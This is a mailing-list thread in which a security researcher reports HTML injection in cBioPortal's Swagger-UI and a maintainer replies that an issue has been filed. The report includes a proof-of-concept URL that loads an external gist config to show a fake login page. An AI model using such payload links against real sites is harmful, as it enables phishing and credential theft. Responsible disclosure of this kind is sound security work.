Swagger-UI is vulnerable to html injection

[Fallen apple]

Hello,

This is fallenapple a security researcher. 

I found a security vulnerability in your assets 

Vulnerability 

Html injection in Swagger-UI 

Proof Of Concept

During the recon process, I found that this Link is vulnerable to HTML injection 

POC attachments:-

Fake Login page

POC payload:-

https://www.cbioportal.org/api/swagger-ui/index.html?config=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json

Regards,
fallenapple

[Benjamin Gross]

Thank you for bringing this to our attention.  I have created an issue so that our engineers can address this:

https://github.com/cBioPortal/cbioportal/issues/10458

Best,

-Benjamin

On Nov 7, 2023, at 1:34 AM, Fallen apple <muneebm...@gmail.com> wrote:

Hello,

This is fallenapple a security researcher. 

I found a security vulnerability in your assets 

Vulnerability 

Html injection in Swagger-UI 

Proof Of Concept

During the recon process, I found that this Link is vulnerable to HTML injection 

POC attachments:-

<screen02.jpg>

Fake Login page

POC payload:-

https://www.cbioportal.org/api/swagger-ui/index.html?config=https://gist.githubusercontent.com/zenelite123/af28f9b61759b800cb65f93ae7227fb5/raw/04003a9372ac6a5077ad76aa3d20f2e76635765b/test.json

Regards,
fallenapple

--
You received this message because you are subscribed to the Google Groups "cBioPortal for Cancer Genomics Discussion Group" group.
To unsubscribe from this group and stop receiving emails from it, send an email to cbioportal+...@googlegroups.com.
To view this discussion on the web visit https://groups.google.com/d/msgid/cbioportal/1b88beaa-70c2-405c-b237-39c6de3e91cdn%40googlegroups.com.
<screen02.jpg>